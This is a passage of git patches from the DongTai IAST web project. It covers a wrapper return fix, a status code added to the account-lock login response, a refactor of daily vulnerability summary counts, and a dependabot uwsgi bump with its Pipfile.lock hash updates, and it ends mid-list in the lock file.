-79,7 +79,7 @@ def wrapper(*args: Any, **kwargs: Any): token_func = context_func.set(to_patch_func) token_count = context_count.set(0) try: - to_patch_func(*args, **kwargs) + return to_patch_func(*args, **kwargs) finally: context_func.reset(token_func) context_count.reset(token_count) From b7b4086a3927ce3d26a47f768cb25ecd8cff8670 Mon Sep 17 00:00:00 2001 From: st1020 Date: Thu, 24 Aug 2023 15:27:12 +0800 Subject: [PATCH 015/114] feat: add login lock status --- dongtai_web/views/user_login.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_web/views/user_login.py b/dongtai_web/views/user_login.py index 5f17a9aff..c65afdf02 100644 --- a/dongtai_web/views/user_login.py +++ b/dongtai_web/views/user_login.py @@ -68,7 +68,7 @@ def post(self, request: Request): or (user.failed_login_count == 9 and delta < timedelta(minutes=60)) or user.failed_login_count >= 10 ): - return R.failure(msg="账号已被锁定") + return R.failure(status=206, msg="账号已被锁定") user.failed_login_count = 0 user.save() login(request, user) From 7f339f356dcc2679ec296dd868a43b14ceb9e3a4 Mon Sep 17 00:00:00 2001 From: st1020 Date: Thu, 24 Aug 2023 17:55:06 +0800 Subject: [PATCH 016/114] feat: modify project summary api day_num field --- dongtai_web/views/utils/commonstats.py | 29 +++++++++++++++++--------- 1 file changed, 19 insertions(+), 10 deletions(-) diff --git a/dongtai_web/views/utils/commonstats.py b/dongtai_web/views/utils/commonstats.py index 1d629af9e..2d49b07c1 100644 --- a/dongtai_web/views/utils/commonstats.py +++ b/dongtai_web/views/utils/commonstats.py @@ -95,17 +95,18 @@ def get_summary_by_agent_ids(agent_ids: Iterable): else: day_num_dict[i["day_label"]] = [i] day_num_data = [] - for _, day_label in daylist: - obj = {"day_label": day_label, "day_num": 0} - for i in range(1, 5 + 1): - obj["day_num_level_" + str(i)] = 0 + for day_label_i in range(len(daylist)): + _, day_label = daylist[day_label_i] if day_label in day_num_dict: + obj = get_empty_day_num_num(day_label) count = 0 for i in day_num_dict[day_label]: obj["day_num_level_" + str(i["level_id"])] = i["count"] count += i["count"] obj["day_num"] = count - day_num_data.append(obj) + day_num_data.append(obj) + elif day_label_i + 1 < len(daylist) and daylist[day_label_i + 1][1] in day_num_dict: + day_num_data.append(get_empty_day_num_num(day_label)) data["day_num"] = day_num_data levelInfo = IastVulLevel.objects.all() levelIdArr = {} @@ -193,17 +194,18 @@ def get_summary_by_project(project_id: int, project_version_id: int): else: day_num_dict[i["day_label"]] = [i] day_num_data = [] - for _, day_label in daylist: - obj = {"day_label": day_label, "day_num": 0} - for i in range(1, 5 + 1): - obj["day_num_level_" + str(i)] = 0 + for day_label_i in range(len(daylist)): + _, day_label = daylist[day_label_i] if day_label in day_num_dict: + obj = get_empty_day_num_num(day_label) count = 0 for i in day_num_dict[day_label]: obj["day_num_level_" + str(i["level_id"])] = i["count"] count += i["count"] obj["day_num"] = count - day_num_data.append(obj) + day_num_data.append(obj) + elif day_label_i + 1 < len(daylist) and daylist[day_label_i + 1][1] in day_num_dict: + day_num_data.append(get_empty_day_num_num(day_label)) data["day_num"] = day_num_data levelInfo = IastVulLevel.objects.all() levelIdArr = {} @@ -222,6 +224,13 @@ def get_summary_by_project(project_id: int, project_version_id: int): return data +def get_empty_day_num_num(day_label: str): + obj = {"day_label": day_label, "day_num": 0} + for i in range(1, 5 + 1): + obj["day_num_level_" + str(i)] = 0 + return obj + + def geneatre_vul_timerange_count_queryset( vul_queryset: QuerySet, time_gt: int, From c9e924f6c59218fddd6070f7f209eb3db024b204 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 24 Aug 2023 20:23:19 +0000 Subject: [PATCH 017/114] build(deps): bump uwsgi from 2.0.21 to 2.0.22 Bumps [uwsgi](https://uwsgi-docs.readthedocs.io/en/latest/) from 2.0.21 to 2.0.22. --- updated-dependencies: - dependency-name: uwsgi dependency-type: direct:production ... Signed-off-by: dependabot[bot] --- Pipfile | 2 +- Pipfile.lock | 289 ++++++++++++++++++++++++++------------------------- 2 files changed, 151 insertions(+), 140 deletions(-) diff --git a/Pipfile b/Pipfile index ed65d3a55..2bd692b99 100644 --- a/Pipfile +++ b/Pipfile @@ -75,7 +75,7 @@ pillow = "==9.3.0" pyrsistent = "==0.19.1" pytz = "==2022.6" types-pyyaml = ">=6.0.12.2" -uwsgi = "==2.0.21" +uwsgi = "==2.0.22" marisa-trie = "==0.8.0" gunicorn = "==20.1.0" celery-singleton = "*" diff --git a/Pipfile.lock b/Pipfile.lock index 9b2dd31f4..5b645c1b9 100644 --- a/Pipfile.lock +++ b/Pipfile.lock @@ -1,7 +1,7 @@ { "_meta": { "hash": { - "sha256": "ea26523ac717832c23ff3c25488c707c515b73495a620c03ffd5ee7d2e2b1205" + "sha256": "9d3d426bca6b1620c3c03d86adecc638027dc630fc6d234893453ada03e9918d" }, "pipfile-spec": 6, "requires": { @@ -308,18 +308,18 @@ }, "click": { "hashes": [ - "sha256:48ee849951919527a045bfe3bf7baa8a959c423134e1a5b98c05c20ba75a1cbd", - "sha256:fa244bb30b3b5ee2cae3da8f55c9e5e0c0e86093306301fb418eb9dc40fbded5" + "sha256:ae74fb96c20a0277a1d615f1e4d73c8414f5a98db8b799a7931d1582f3390c28", + "sha256:ca9853ad459e787e2192211578cc907e7594e294c7ccc834310722b41b9ca6de" ], "markers": "python_version >= '3.7'", - "version": "==8.1.6" + "version": "==8.1.7" }, "click-didyoumean": { "hashes": [ "sha256:a0713dc7a1de3f06bc0df5a9567ad19ead2d3d5689b434768a6145bff77c0667", "sha256:f184f0d851d96b6d29297354ed981b7dd71df7ff500d82fa6d11f0856bee8035" ], - "markers": "python_version < '4.0' and python_full_version >= '3.6.2'", + "markers": "python_version < '4' and python_full_version >= '3.6.2'", "version": "==0.3.0" }, "click-plugins": { @@ -1175,11 +1175,11 @@ }, "model-bakery": { "hashes": [ - "sha256:0f54a4548722ecee0183d82eabe1adf8f74303e6ce08705cfe228a96ef3bb7d9", - "sha256:dba7444c9593261b12dcb21f8f9e1ba668fafc70804f15dfd6aa208b9e3f558f" + "sha256:16178e608e2f414814e3383a9855e39c08810c9dee7b1d8e1354f1fdb7c013bc", + "sha256:c76813d8836ce339df4abd8648d6ed195fd0363f395dd1cb11b8a1898224e4e7" ], - "markers": "python_version >= '3.7'", - "version": "==1.13.0" + "markers": "python_version >= '3.8'", + "version": "==1.15.0" }, "mypy": { "hashes": [ @@ -1496,118 +1496,123 @@ }, "pydantic": { "hashes": [ - "sha256:22d63db5ce4831afd16e7c58b3192d3faf8f79154980d9397d9867254310ba4b", - "sha256:43bdbf359d6304c57afda15c2b95797295b702948082d4c23851ce752f21da70" + "sha256:1607cc106602284cd4a00882986570472f193fde9cb1259bceeaedb26aa79a6d", + "sha256:45b5e446c6dfaad9444819a293b921a40e1db1aa61ea08aede0522529ce90e81" ], "markers": "python_version >= '3.7'", - "version": "==2.1.1" + "version": "==2.3.0" }, "pydantic-core": { "hashes": [ - "sha256:01947ad728f426fa07fcb26457ebf90ce29320259938414bc0edd1476e75addb", - "sha256:0455876d575a35defc4da7e0a199596d6c773e20d3d42fa1fc29f6aa640369ed", - "sha256:047580388644c473b934d27849f8ed8dbe45df0adb72104e78b543e13bf69762", - "sha256:04922fea7b13cd480586fa106345fe06e43220b8327358873c22d8dfa7a711c7", - "sha256:08f89697625e453421401c7f661b9d1eb4c9e4c0a12fd256eeb55b06994ac6af", - "sha256:0a507d7fa44688bbac76af6521e488b3da93de155b9cba6f2c9b7833ce243d59", - "sha256:0d726108c1c0380b88b6dd4db559f0280e0ceda9e077f46ff90bc85cd4d03e77", - "sha256:12ef6838245569fd60a179fade81ca4b90ae2fa0ef355d616f519f7bb27582db", - "sha256:153a61ac4030fa019b70b31fb7986461119230d3ba0ab661c757cfea652f4332", - "sha256:16468bd074fa4567592d3255bf25528ed41e6b616d69bf07096bdb5b66f947d1", - "sha256:17156abac20a9feed10feec867fddd91a80819a485b0107fe61f09f2117fe5f3", - "sha256:1927f0e15d190f11f0b8344373731e28fd774c6d676d8a6cfadc95c77214a48b", - "sha256:1e8a7c62d15a5c4b307271e4252d76ebb981d6251c6ecea4daf203ef0179ea4f", - "sha256:2ad538b7e07343001934417cdc8584623b4d8823c5b8b258e75ec8d327cec969", - "sha256:2ca4687dd996bde7f3c420def450797feeb20dcee2b9687023e3323c73fc14a2", - "sha256:2edef05b63d82568b877002dc4cb5cc18f8929b59077120192df1e03e0c633f8", - "sha256:2f9ea0355f90db2a76af530245fa42f04d98f752a1236ed7c6809ec484560d5b", - "sha256:30527d173e826f2f7651f91c821e337073df1555e3b5a0b7b1e2c39e26e50678", - "sha256:32a1e0352558cd7ccc014ffe818c7d87b15ec6145875e2cc5fa4bb7351a1033d", - "sha256:3534118289e33130ed3f1cc487002e8d09b9f359be48b02e9cd3de58ce58fba9", - "sha256:36ba9e728588588f0196deaf6751b9222492331b5552f865a8ff120869d372e0", - "sha256:382f0baa044d674ad59455a5eff83d7965572b745cc72df35c52c2ce8c731d37", - "sha256:394f12a2671ff8c4dfa2e85be6c08be0651ad85bc1e6aa9c77c21671baaf28cd", - "sha256:3ba2c9c94a9176f6321a879c8b864d7c5b12d34f549a4c216c72ce213d7d953c", - "sha256:3ded19dcaefe2f6706d81e0db787b59095f4ad0fbadce1edffdf092294c8a23f", - "sha256:3fcf529382b282a30b466bd7af05be28e22aa620e016135ac414f14e1ee6b9e1", - "sha256:43a405ce520b45941df9ff55d0cd09762017756a7b413bbad3a6e8178e64a2c2", - "sha256:453862ab268f6326b01f067ed89cb3a527d34dc46f6f4eeec46a15bbc706d0da", - "sha256:4665f7ed345012a8d2eddf4203ef145f5f56a291d010382d235b94e91813f88a", - "sha256:478f5f6d7e32bd4a04d102160efb2d389432ecf095fe87c555c0a6fc4adfc1a4", - "sha256:49db206eb8fdc4b4f30e6e3e410584146d813c151928f94ec0db06c4f2595538", - "sha256:4b262bbc13022f2097c48a21adcc360a81d83dc1d854c11b94953cd46d7d3c07", - "sha256:4cbe929efa77a806e8f1a97793f2dc3ea3475ae21a9ed0f37c21320fe93f6f50", - "sha256:4e562cc63b04636cde361fd47569162f1daa94c759220ff202a8129902229114", - "sha256:546064c55264156b973b5e65e5fafbe5e62390902ce3cf6b4005765505e8ff56", - "sha256:54df7df399b777c1fd144f541c95d351b3aa110535a6810a6a569905d106b6f3", - "sha256:56a85fa0dab1567bd0cac10f0c3837b03e8a0d939e6a8061a3a420acd97e9421", - "sha256:57a53a75010c635b3ad6499e7721eaa3b450e03f6862afe2dbef9c8f66e46ec8", - "sha256:584a7a818c84767af16ce8bda5d4f7fedb37d3d231fc89928a192f567e4ef685", - "sha256:5fd905a69ac74eaba5041e21a1e8b1a479dab2b41c93bdcc4c1cede3c12a8d86", - "sha256:61d4e713f467abcdd59b47665d488bb898ad3dd47ce7446522a50e0cbd8e8279", - "sha256:6213b471b68146af97b8551294e59e7392c2117e28ffad9c557c65087f4baee3", - "sha256:63797499a219d8e81eb4e0c42222d0a4c8ec896f5c76751d4258af95de41fdf1", - "sha256:64e8012ad60a5f0da09ed48725e6e923d1be25f2f091a640af6079f874663813", - "sha256:664402ef0c238a7f8a46efb101789d5f2275600fb18114446efec83cfadb5b66", - "sha256:68199ada7c310ddb8c76efbb606a0de656b40899388a7498954f423e03fc38be", - "sha256:69159afc2f2dc43285725f16143bc5df3c853bc1cb7df6021fce7ef1c69e8171", - "sha256:6f855bcc96ed3dd56da7373cfcc9dcbabbc2073cac7f65c185772d08884790ce", - "sha256:6feb4b64d11d5420e517910d60a907d08d846cacaf4e029668725cd21d16743c", - "sha256:72f1216ca8cef7b8adacd4c4c6b89c3b0c4f97503197f5284c80f36d6e4edd30", - "sha256:77dadc764cf7c5405e04866181c5bd94a447372a9763e473abb63d1dfe9b7387", - "sha256:782fced7d61469fd1231b184a80e4f2fa7ad54cd7173834651a453f96f29d673", - "sha256:79262be5a292d1df060f29b9a7cdd66934801f987a817632d7552534a172709a", - "sha256:7aa82d483d5fb867d4fb10a138ffd57b0f1644e99f2f4f336e48790ada9ada5e", - "sha256:853f103e2b9a58832fdd08a587a51de8b552ae90e1a5d167f316b7eabf8d7dde", - "sha256:867d3eea954bea807cabba83cfc939c889a18576d66d197c60025b15269d7cc0", - "sha256:878a5017d93e776c379af4e7b20f173c82594d94fa073059bcc546789ad50bf8", - "sha256:884235507549a6b2d3c4113fb1877ae263109e787d9e0eb25c35982ab28d0399", - "sha256:8c938c96294d983dcf419b54dba2d21056959c22911d41788efbf949a29ae30d", - "sha256:8efc1be43b036c2b6bcfb1451df24ee0ddcf69c31351003daf2699ed93f5687b", - "sha256:8fba0aff4c407d0274e43697e785bcac155ad962be57518d1c711f45e72da70f", - "sha256:90f3785146f701e053bb6b9e8f53acce2c919aca91df88bd4975be0cb926eb41", - "sha256:9137289de8fe845c246a8c3482dd0cb40338846ba683756d8f489a4bd8fddcae", - "sha256:9206c14a67c38de7b916e486ae280017cf394fa4b1aa95cfe88621a4e1d79725", - "sha256:94d2b36a74623caab262bf95f0e365c2c058396082bd9d6a9e825657d0c1e7fa", - "sha256:97c6349c81cee2e69ef59eba6e6c08c5936e6b01c2d50b9e4ac152217845ae09", - "sha256:a027f41c5008571314861744d83aff75a34cf3a07022e0be32b214a5bc93f7f1", - "sha256:a08fd490ba36d1fbb2cd5dcdcfb9f3892deb93bd53456724389135712b5fc735", - "sha256:a297c0d6c61963c5c3726840677b798ca5b7dfc71bc9c02b9a4af11d23236008", - "sha256:a4ea23b07f29487a7bef2a869f68c7ee0e05424d81375ce3d3de829314c6b5ec", - "sha256:a8b7acd04896e8f161e1500dc5f218017db05c1d322f054e89cbd089ce5d0071", - "sha256:ac2b680de398f293b68183317432b3d67ab3faeba216aec18de0c395cb5e3060", - "sha256:af24ad4fbaa5e4a2000beae0c3b7fd1c78d7819ab90f9370a1cfd8998e3f8a3c", - "sha256:af788b64e13d52fc3600a68b16d31fa8d8573e3ff2fc9a38f8a60b8d94d1f012", - "sha256:b013c7861a7c7bfcec48fd709513fea6f9f31727e7a0a93ca0dd12e056740717", - "sha256:b2799c2eaf182769889761d4fb4d78b82bc47dae833799fedbf69fc7de306faa", - "sha256:b27f3e67f6e031f6620655741b7d0d6bebea8b25d415924b3e8bfef2dd7bd841", - "sha256:b7206e41e04b443016e930e01685bab7a308113c0b251b3f906942c8d4b48fcb", - "sha256:b85778308bf945e9b33ac604e6793df9b07933108d20bdf53811bc7c2798a4af", - "sha256:bd7d1dde70ff3e09e4bc7a1cbb91a7a538add291bfd5b3e70ef1e7b45192440f", - "sha256:be86c2eb12fb0f846262ace9d8f032dc6978b8cb26a058920ecb723dbcb87d05", - "sha256:bf10963d8aed8bbe0165b41797c9463d4c5c8788ae6a77c68427569be6bead41", - "sha256:c1375025f0bfc9155286ebae8eecc65e33e494c90025cda69e247c3ccd2bab00", - "sha256:c5d8e764b5646623e57575f624f8ebb8f7a9f7fd1fae682ef87869ca5fec8dcf", - "sha256:cba5ad5eef02c86a1f3da00544cbc59a510d596b27566479a7cd4d91c6187a11", - "sha256:cc086ddb6dc654a15deeed1d1f2bcb1cb924ebd70df9dca738af19f64229b06c", - "sha256:d0c2b713464a8e263a243ae7980d81ce2de5ac59a9f798a282e44350b42dc516", - "sha256:d93aedbc4614cc21b9ab0d0c4ccd7143354c1f7cffbbe96ae5216ad21d1b21b5", - "sha256:d9610b47b5fe4aacbbba6a9cb5f12cbe864eec99dbfed5710bd32ef5dd8a5d5b", - "sha256:da055a1b0bfa8041bb2ff586b2cb0353ed03944a3472186a02cc44a557a0e661", - "sha256:dd2429f7635ad4857b5881503f9c310be7761dc681c467a9d27787b674d1250a", - "sha256:de39eb3bab93a99ddda1ac1b9aa331b944d8bcc4aa9141148f7fd8ee0299dafc", - "sha256:e40b1e97edd3dc127aa53d8a5e539a3d0c227d71574d3f9ac1af02d58218a122", - "sha256:e412607ca89a0ced10758dfb8f9adcc365ce4c1c377e637c01989a75e9a9ec8a", - "sha256:e953353180bec330c3b830891d260b6f8e576e2d18db3c78d314e56bb2276066", - "sha256:ec3473c9789cc00c7260d840c3db2c16dbfc816ca70ec87a00cddfa3e1a1cdd5", - "sha256:efff8b6761a1f6e45cebd1b7a6406eb2723d2d5710ff0d1b624fe11313693989", - "sha256:f773b39780323a0499b53ebd91a28ad11cde6705605d98d999dfa08624caf064", - "sha256:fa8e48001b39d54d97d7b380a0669fa99fc0feeb972e35a2d677ba59164a9a22", - "sha256:ff246c0111076c8022f9ba325c294f2cb5983403506989253e04dbae565e019b", - "sha256:ffe18407a4d000c568182ce5388bbbedeb099896904e43fc14eee76cfae6dec5" + "sha256:002d0ea50e17ed982c2d65b480bd975fc41086a5a2f9c924ef8fc54419d1dea3", + "sha256:02e1c385095efbd997311d85c6021d32369675c09bcbfff3b69d84e59dc103f6", + "sha256:046af9cfb5384f3684eeb3f58a48698ddab8dd870b4b3f67f825353a14441418", + "sha256:04fe5c0a43dec39aedba0ec9579001061d4653a9b53a1366b113aca4a3c05ca7", + "sha256:07a1aec07333bf5adebd8264047d3dc518563d92aca6f2f5b36f505132399efc", + "sha256:1480fa4682e8202b560dcdc9eeec1005f62a15742b813c88cdc01d44e85308e5", + "sha256:1508f37ba9e3ddc0189e6ff4e2228bd2d3c3a4641cbe8c07177162f76ed696c7", + "sha256:171a4718860790f66d6c2eda1d95dd1edf64f864d2e9f9115840840cf5b5713f", + "sha256:19e20f8baedd7d987bd3f8005c146e6bcbda7cdeefc36fad50c66adb2dd2da48", + "sha256:1a0ddaa723c48af27d19f27f1c73bdc615c73686d763388c8683fe34ae777bad", + "sha256:1aa712ba150d5105814e53cb141412217146fedc22621e9acff9236d77d2a5ef", + "sha256:1ac1750df1b4339b543531ce793b8fd5c16660a95d13aecaab26b44ce11775e9", + "sha256:1c721bfc575d57305dd922e6a40a8fe3f762905851d694245807a351ad255c58", + "sha256:1ce8c84051fa292a5dc54018a40e2a1926fd17980a9422c973e3ebea017aa8da", + "sha256:1fa1f6312fb84e8c281f32b39affe81984ccd484da6e9d65b3d18c202c666149", + "sha256:22134a4453bd59b7d1e895c455fe277af9d9d9fbbcb9dc3f4a97b8693e7e2c9b", + "sha256:23470a23614c701b37252618e7851e595060a96a23016f9a084f3f92f5ed5881", + "sha256:240a015102a0c0cc8114f1cba6444499a8a4d0333e178bc504a5c2196defd456", + "sha256:252851b38bad3bfda47b104ffd077d4f9604a10cb06fe09d020016a25107bf98", + "sha256:2a20c533cb80466c1d42a43a4521669ccad7cf2967830ac62c2c2f9cece63e7e", + "sha256:2dd50d6a1aef0426a1d0199190c6c43ec89812b1f409e7fe44cb0fbf6dfa733c", + "sha256:340e96c08de1069f3d022a85c2a8c63529fd88709468373b418f4cf2c949fb0e", + "sha256:3796a6152c545339d3b1652183e786df648ecdf7c4f9347e1d30e6750907f5bb", + "sha256:37a822f630712817b6ecc09ccc378192ef5ff12e2c9bae97eb5968a6cdf3b862", + "sha256:3a750a83b2728299ca12e003d73d1264ad0440f60f4fc9cee54acc489249b728", + "sha256:3c8945a105f1589ce8a693753b908815e0748f6279959a4530f6742e1994dcb6", + "sha256:3ccc13afee44b9006a73d2046068d4df96dc5b333bf3509d9a06d1b42db6d8bf", + "sha256:3f90e5e3afb11268628c89f378f7a1ea3f2fe502a28af4192e30a6cdea1e7d5e", + "sha256:4292ca56751aebbe63a84bbfc3b5717abb09b14d4b4442cc43fd7c49a1529efd", + "sha256:430ddd965ffd068dd70ef4e4d74f2c489c3a313adc28e829dd7262cc0d2dd1e8", + "sha256:439a0de139556745ae53f9cc9668c6c2053444af940d3ef3ecad95b079bc9987", + "sha256:44b4f937b992394a2e81a5c5ce716f3dcc1237281e81b80c748b2da6dd5cf29a", + "sha256:48c1ed8b02ffea4d5c9c220eda27af02b8149fe58526359b3c07eb391cb353a2", + "sha256:4ef724a059396751aef71e847178d66ad7fc3fc969a1a40c29f5aac1aa5f8784", + "sha256:50555ba3cb58f9861b7a48c493636b996a617db1a72c18da4d7f16d7b1b9952b", + "sha256:522a9c4a4d1924facce7270c84b5134c5cabcb01513213662a2e89cf28c1d309", + "sha256:5493a7027bfc6b108e17c3383959485087d5942e87eb62bbac69829eae9bc1f7", + "sha256:56ea80269077003eaa59723bac1d8bacd2cd15ae30456f2890811efc1e3d4413", + "sha256:5a2a3c9ef904dcdadb550eedf3291ec3f229431b0084666e2c2aa8ff99a103a2", + "sha256:5cfde4fab34dd1e3a3f7f3db38182ab6c95e4ea91cf322242ee0be5c2f7e3d2f", + "sha256:5e4a2cf8c4543f37f5dc881de6c190de08096c53986381daebb56a355be5dfe6", + "sha256:5e9c068f36b9f396399d43bfb6defd4cc99c36215f6ff33ac8b9c14ba15bdf6b", + "sha256:5ed7ceca6aba5331ece96c0e328cd52f0dcf942b8895a1ed2642de50800b79d3", + "sha256:5fa159b902d22b283b680ef52b532b29554ea2a7fc39bf354064751369e9dbd7", + "sha256:615a31b1629e12445c0e9fc8339b41aaa6cc60bd53bf802d5fe3d2c0cda2ae8d", + "sha256:621afe25cc2b3c4ba05fff53525156d5100eb35c6e5a7cf31d66cc9e1963e378", + "sha256:6656a0ae383d8cd7cc94e91de4e526407b3726049ce8d7939049cbfa426518c8", + "sha256:672174480a85386dd2e681cadd7d951471ad0bb028ed744c895f11f9d51b9ebe", + "sha256:692b4ff5c4e828a38716cfa92667661a39886e71136c97b7dac26edef18767f7", + "sha256:6bcc1ad776fffe25ea5c187a028991c031a00ff92d012ca1cc4714087e575973", + "sha256:6bf7d610ac8f0065a286002a23bcce241ea8248c71988bda538edcc90e0c39ad", + "sha256:75c0ebbebae71ed1e385f7dfd9b74c1cff09fed24a6df43d326dd7f12339ec34", + "sha256:788be9844a6e5c4612b74512a76b2153f1877cd845410d756841f6c3420230eb", + "sha256:7dc2ce039c7290b4ef64334ec7e6ca6494de6eecc81e21cb4f73b9b39991408c", + "sha256:813aab5bfb19c98ae370952b6f7190f1e28e565909bfc219a0909db168783465", + "sha256:8421cf496e746cf8d6b677502ed9a0d1e4e956586cd8b221e1312e0841c002d5", + "sha256:84e87c16f582f5c753b7f39a71bd6647255512191be2d2dbf49458c4ef024588", + "sha256:84f8bb34fe76c68c9d96b77c60cef093f5e660ef8e43a6cbfcd991017d375950", + "sha256:85cc4d105747d2aa3c5cf3e37dac50141bff779545ba59a095f4a96b0a460e70", + "sha256:883daa467865e5766931e07eb20f3e8152324f0adf52658f4d302242c12e2c32", + "sha256:8b2b1bfed698fa410ab81982f681f5b1996d3d994ae8073286515ac4d165c2e7", + "sha256:8ecbac050856eb6c3046dea655b39216597e373aa8e50e134c0e202f9c47efec", + "sha256:930bfe73e665ebce3f0da2c6d64455098aaa67e1a00323c74dc752627879fc67", + "sha256:9616567800bdc83ce136e5847d41008a1d602213d024207b0ff6cab6753fe645", + "sha256:9680dd23055dd874173a3a63a44e7f5a13885a4cfd7e84814be71be24fba83db", + "sha256:99faba727727b2e59129c59542284efebbddade4f0ae6a29c8b8d3e1f437beb7", + "sha256:9a718d56c4d55efcfc63f680f207c9f19c8376e5a8a67773535e6f7e80e93170", + "sha256:9b33bf9658cb29ac1a517c11e865112316d09687d767d7a0e4a63d5c640d1b17", + "sha256:9e8b374ef41ad5c461efb7a140ce4730661aadf85958b5c6a3e9cf4e040ff4bb", + "sha256:9e9b65a55bbabda7fccd3500192a79f6e474d8d36e78d1685496aad5f9dbd92c", + "sha256:a0b7486d85293f7f0bbc39b34e1d8aa26210b450bbd3d245ec3d732864009819", + "sha256:a53e3195f134bde03620d87a7e2b2f2046e0e5a8195e66d0f244d6d5b2f6d31b", + "sha256:a87c54e72aa2ef30189dc74427421e074ab4561cf2bf314589f6af5b37f45e6d", + "sha256:a892b5b1871b301ce20d40b037ffbe33d1407a39639c2b05356acfef5536d26a", + "sha256:a8acc9dedd304da161eb071cc7ff1326aa5b66aadec9622b2574ad3ffe225525", + "sha256:aaafc776e5edc72b3cad1ccedb5fd869cc5c9a591f1213aa9eba31a781be9ac1", + "sha256:acafc4368b289a9f291e204d2c4c75908557d4f36bd3ae937914d4529bf62a76", + "sha256:b0a5d7edb76c1c57b95df719af703e796fc8e796447a1da939f97bfa8a918d60", + "sha256:b25afe9d5c4f60dcbbe2b277a79be114e2e65a16598db8abee2a2dcde24f162b", + "sha256:b44c42edc07a50a081672e25dfe6022554b47f91e793066a7b601ca290f71e42", + "sha256:b594b64e8568cf09ee5c9501ede37066b9fc41d83d58f55b9952e32141256acd", + "sha256:b962700962f6e7a6bd77e5f37320cabac24b4c0f76afeac05e9f93cf0c620014", + "sha256:bb128c30cf1df0ab78166ded1ecf876620fb9aac84d2413e8ea1594b588c735d", + "sha256:bf9d42a71a4d7a7c1f14f629e5c30eac451a6fc81827d2beefd57d014c006c4a", + "sha256:c6595b0d8c8711e8e1dc389d52648b923b809f68ac1c6f0baa525c6440aa0daa", + "sha256:c8c6660089a25d45333cb9db56bb9e347241a6d7509838dbbd1931d0e19dbc7f", + "sha256:c9d469204abcca28926cbc28ce98f28e50e488767b084fb3fbdf21af11d3de26", + "sha256:d38bbcef58220f9c81e42c255ef0bf99735d8f11edef69ab0b499da77105158a", + "sha256:d4eb77df2964b64ba190eee00b2312a1fd7a862af8918ec70fc2d6308f76ac64", + "sha256:d63b7545d489422d417a0cae6f9898618669608750fc5e62156957e609e728a5", + "sha256:d7050899026e708fb185e174c63ebc2c4ee7a0c17b0a96ebc50e1f76a231c057", + "sha256:d79f1f2f7ebdb9b741296b69049ff44aedd95976bfee38eb4848820628a99b50", + "sha256:d85463560c67fc65cd86153a4975d0b720b6d7725cf7ee0b2d291288433fc21b", + "sha256:d9140ded382a5b04a1c030b593ed9bf3088243a0a8b7fa9f071a5736498c5483", + "sha256:d9b4916b21931b08096efed090327f8fe78e09ae8f5ad44e07f5c72a7eedb51b", + "sha256:df14f6332834444b4a37685810216cc8fe1fe91f447332cd56294c984ecbff1c", + "sha256:e49ce7dc9f925e1fb010fc3d555250139df61fa6e5a0a95ce356329602c11ea9", + "sha256:e61eae9b31799c32c5f9b7be906be3380e699e74b2db26c227c50a5fc7988698", + "sha256:ea053cefa008fda40f92aab937fb9f183cf8752e41dbc7bc68917884454c6362", + "sha256:f06e21ad0b504658a3a9edd3d8530e8cea5723f6ea5d280e8db8efc625b47e49", + "sha256:f14546403c2a1d11a130b537dda28f07eb6c1805a43dae4617448074fd49c282", + "sha256:f1a5d8f18877474c80b7711d870db0eeef9442691fcdb00adabfc97e183ee0b0", + "sha256:f2969e8f72c6236c51f91fbb79c33821d12a811e2a94b7aa59c65f8dbdfad34a", + "sha256:f468d520f47807d1eb5d27648393519655eadc578d5dd862d06873cce04c4d1b", + "sha256:f70dc00a91311a1aea124e5f64569ea44c011b58433981313202c46bccbec0e1", + "sha256:f93255b3e4d64785554e544c1c76cd32f4a354fa79e2eeca5d16ac2e7fdd57aa" ], "markers": "python_version >= '3.7'", - "version": "==2.4.0" + "version": "==2.6.3" }, "pymysql": { "hashes": [ @@ -1794,28 +1799,34 @@ }, "scipy": { "hashes": [ - "sha256:08d957ca82d3535b3b9ba6c8ff355d78fe975271874e2af267cb5add5bd78625", - "sha256:249cfa465c379c9bb2c20123001e151ff5e29b351cbb7f9c91587260602c58d0", - "sha256:366a6a937110d80dca4f63b3f5b00cc89d36f678b2d124a01067b154e692bab1", - "sha256:39154437654260a52871dfde852adf1b93b1d1bc5dc0ffa70068f16ec0be2624", - "sha256:396fae3f8c12ad14c5f3eb40499fd06a6fef8393a6baa352a652ecd51e74e029", - "sha256:3b9963798df1d8a52db41a6fc0e6fa65b1c60e85d73da27ae8bb754de4792481", - "sha256:3e8eb42db36526b130dfbc417609498a6192381abc1975b91e3eb238e0b41c1a", - "sha256:512fdc18c65f76dadaca139348e525646d440220d8d05f6d21965b8d4466bccd", - "sha256:aec8c62fbe52914f9cf28d846cf0401dd80ab80788bbab909434eb336ed07c04", - "sha256:b41a0f322b4eb51b078cb3441e950ad661ede490c3aca66edef66f4b37ab1877", - "sha256:b4bb943010203465ac81efa392e4645265077b4d9e99b66cf3ed33ae12254173", - "sha256:b588311875c58d1acd4ef17c983b9f1ab5391755a47c3d70b6bd503a45bfaf71", - "sha256:ba94eeef3c9caa4cea7b402a35bb02a5714ee1ee77eb98aca1eed4543beb0f4c", - "sha256:be8c962a821957fdde8c4044efdab7a140c13294997a407eaee777acf63cbf0c", - "sha256:cce154372f0ebe88556ed06d7b196e9c2e0c13080ecb58d0f35062dc7cc28b47", - "sha256:d51565560565a0307ed06fa0ec4c6f21ff094947d4844d6068ed04400c72d0c3", - "sha256:e866514bc2d660608447b6ba95c8900d591f2865c07cca0aa4f7ff3c4ca70f30", - "sha256:fb5b492fa035334fd249f0973cc79ecad8b09c604b42a127a677b45a9a3d4289", - "sha256:ffb28e3fa31b9c376d0fb1f74c1f13911c8c154a760312fbee87a21eb21efe31" + "sha256:0f3261f14b767b316d7137c66cc4f33a80ea05841b9c87ad83a726205b901423", + "sha256:10eb6af2f751aa3424762948e5352f707b0dece77288206f227864ddf675aca0", + "sha256:1342ca385c673208f32472830c10110a9dcd053cf0c4b7d4cd7026d0335a6c1d", + "sha256:214cdf04bbae7a54784f8431f976704ed607c4bc69ba0d5d5d6a9df84374df76", + "sha256:2b997a5369e2d30c97995dcb29d638701f8000d04df01b8e947f206e5d0ac788", + "sha256:2c91cf049ffb5575917f2a01da1da082fd24ed48120d08a6e7297dfcac771dcd", + "sha256:3aeb87661de987f8ec56fa6950863994cd427209158255a389fc5aea51fa7055", + "sha256:4447ad057d7597476f9862ecbd9285bbf13ba9d73ce25acfa4e4b11c6801b4c9", + 